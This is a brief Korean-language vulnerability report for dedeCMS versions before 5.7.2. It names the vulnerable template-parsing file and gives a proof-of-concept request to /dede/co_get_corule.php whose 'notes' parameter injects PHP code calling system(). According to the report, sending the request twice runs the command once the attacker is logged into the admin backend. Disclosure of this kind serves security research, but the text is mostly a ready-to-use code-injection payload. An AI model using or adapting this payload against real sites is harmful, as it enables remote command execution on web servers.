
CVE 보고서
BUG_Author: Ewoji
영향받는 버전: dedeCMS < 5.7.2
공급업체: Shanghai Zhuozhuo Network Technology Co., LTD
소프트웨어: dedeCMS
취약점 파일:
/include/dedetag.class.php설치 후 백그라운드에 로그인합니다.
템플릿 악용
익스플로잇 검증:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command